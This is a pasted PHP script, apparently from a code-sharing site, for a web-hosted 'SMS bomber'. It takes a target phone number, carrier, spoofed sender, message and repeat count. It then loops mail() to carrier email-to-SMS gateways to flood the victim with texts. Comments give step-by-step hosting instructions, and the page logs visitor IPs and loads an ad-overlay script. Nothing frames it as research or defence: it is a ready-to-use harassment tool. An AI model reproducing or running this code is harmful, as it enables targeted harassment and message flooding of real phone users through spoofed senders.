Sms bomber.php


SUBMITTED BY: KenKaneki315

DATE: April 14, 2016, 2:58 a.m.

FORMAT: PHP

SIZE: 5.9 kB

HITS: 701

  1. <p style="text-align: center;">
  2. IP's are being logged, don't abuse this free bomber.
  3. </p>
  4. <?php
  5. //Copy & Paste EVERYTHING in this file and save it in notepad as index.php. It will not work if you don't copy everything and it wont work unless it's saved as a index.php. Once you have the file you can upload it to your website/hosting. I personally use ulmb.com.
  6. // Open up notepad++ and paste this source into a new document. Edit the password if you choose and save this
  7. // as smsbomber and select PHP as the Save As Type File You will end up with a file named smsbomber.php
  8. // Create a txt file named log.txt and make sure you put it in the same directory as the smsbomber.php file
  9. // When you are done remember the default password is: PASSWORD
  10. session_start();
  11. // Change Your Password Here
  12. $v_PASSWORD = "ridgehf";
  13. $v_USER_IP = $_SERVER['REMOTE_ADDR'];
  14. $v_DATE = date( 'l jS \of F Y h:i:s A' );
  15. $v_LOG_FILE = fopen( "Log.txt", a );
  16. // Mobile Punish
  17. echo'<html>
  18. <body bgcolor="black" text="#33ff00">
  19. <table align="center" cellspacing="5">
  20. <tr><td colspan=2 align="center"> <font size="6"><strong>Mobile SMS Punisher</strong></font> <br /><font color="#FF0000">by <br />Ridgeâ„¢</font></td></tr>';
  21. if(( $_POST['pass_submit'] && $_POST['pass'] == $v_PASSWORD ) || $_SESSION['loggedin'] == 1 )
  22. {
  23. $_SESSION['loggedin'] = 1;
  24. // The Name You Save Your .php file as can be changed here. Change "smsbomber.php" to your choosing if you named your saved file different
  25. echo'<form action="index.php" method="post" name="submit">
  26. <tr><td></td></tr>
  27. <tr>
  28. <td align="right" width="40%">Carrier: </td>
  29. <td>
  30. <select name="carrier">
  31. <option value="tmobile">T-Mobile</option>
  32. <option value="virginmobile">Virgin Mobile</option>
  33. <option value="cingular">ATT</option>
  34. <option value="sprint">Sprint</option>
  35. <option value="verizon">Verizon</option>
  36. <option value="nextel">Nextel</option>
  37. </select>
  38. </td>
  39. </tr>
  40. <tr>
  41. <td align="right">Number: </td>
  42. <td><input type="text" name="number" /></td>
  43. </tr>
  44. <tr>
  45. <td align="right">From: </td>
  46. <td><input type="text" name="from" /></td>
  47. </tr>
  48. <tr>
  49. <td align="right">Subject: </td>
  50. <td><input type="text" name="sub" /></td>
  51. </tr>
  52. <tr>
  53. <td align="right">Message: </td>
  54. <td><input type="text" name="body" /></td>
  55. </tr>
  56. <tr>
  57. <td align="right">Count: </td>
  58. <td><input type="text" name="count" /></td>
  59. </tr>
  60. <tr>
  61. <td colspan=2 align="center"><input type="submit" name="submit" value="BOMB IT" /></td>
  62. <p style="text-align: center;">
  63. Source Code Download:
  64. <a href="http://pastebin.com/m9k9mnZc">Source Code Here</a>
  65. </p>
  66. </tr>
  67. </form>';
  68. fwrite( $v_LOG_FILE, $v_USER_IP." ACCESSED THIS TOOL ON [ ".$v_DATE." ]"."\n" );
  69. if( $_POST['submit'] )
  70. {
  71. $v_NUMBER = $_POST['number'];
  72. $v_FROM = 'MIME-Version: 1.0' . "\r\n";
  73. $v_FROM .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  74. $v_FROM .= 'From: ' . $_POST['from'] . '<' . $_POST['from'] . '>' . "\r\n";
  75. $v_COUNT = $_POST['count'];
  76. $v_SUBJECT = $_POST['sub'];
  77. $v_BODY = $_POST['body'];
  78. $v_CARRIER = $_POST['carrier'];
  79. if( $v_CARRIER == "tmobile" )
  80. $v_CARRIER = $v_NUMBER."@tmomail.net";
  81. else if( $v_CARRIER == "virginmobile" )
  82. $v_CARRIER = $v_NUMBER."@vmobl.com";
  83. else if( $v_CARRIER == "cingular" )
  84. $v_CARRIER = $v_NUMBER."@cingularme.com";
  85. else if( $v_CARRIER == "sprint" )
  86. $v_CARRIER = $v_NUMBER."@messaging.sprintpcs.com";
  87. else if( $v_CARRIER == "verizon" )
  88. $v_CARRIER = $v_NUMBER."@vtext.com";
  89. else if( $v_CARRIER == "nextel" )
  90. $v_CARRIER = $v_NUMBER."@nextel.com";
  91. else
  92. die( "Invalid Selection." );
  93. for( $i = 0; $i < $v_COUNT; $i++ )
  94. {
  95. mail( $v_CARRIER, $v_SUBJECT, $v_BODY, $v_FROM );
  96. }
  97. fwrite( $v_LOG_FILE, $v_USER_IP." Bombed [ ".$v_NUMBER." ] On [ ".$v_DATE." ] [ ".$v_COUNT." ] Times\n" );
  98. echo '<div align="center"><font size="6">';
  99. echo "Bomed ".$v_NUMBER." ".$v_COUNT." times!";
  100. echo '</font></div>';
  101. }
  102. }
  103. else
  104. {
  105. if( $_POST['pass_submit'] )
  106. {
  107. if( $_POST['pass'] != "" )
  108. {
  109. echo'<tr><td colspan=2 align="center"> <font size="6" color="#FF0000" ><strong>INVALID PASS!</strong></font></td></tr>';
  110. fwrite( $v_LOG_FILE, $v_USER_IP." FAILED LOGIN ON [ ".$v_DATE." ]\n" );
  111. }
  112. else if( $_POST['pass'] == "" )
  113. {
  114. echo'<tr><td colspan=2 align="center"> <font size="6" color="#FF0000" ><strong>ENTER A PASS!</strong></font></td></tr>';
  115. }
  116. }
  117. echo'<form action="index.php" method="post" name="pass_submit">
  118. <tr><td></td></tr>
  119. <tr>
  120. <td align="center"><font color="#ff">Password: </font></td>
  121. </tr>
  122. <tr>
  123. <td align="center"><input type="text" name="pass" /></td>
  124. </tr>
  125. <tr>
  126. <td colspan=2 align="center"><input type="submit" name="pass_submit" value="Login" /></td>
  127. </tr>
  128. </form>';
  129. }
  130. echo'</table>
  131. </body>
  132. </html>';
  133. ?>
  134. <script type="text/javascript" src="http://adfoc.us/js/siteoverlay/script.js"></script>
  135. <script type="text/javascript">
  136. var id_user = 10859;
  137. var frequency_cap = 50;
  138. var delay_nextad = 5;
  139. var delay_pageload = 0;
  140. </script>

comments powered by Disqus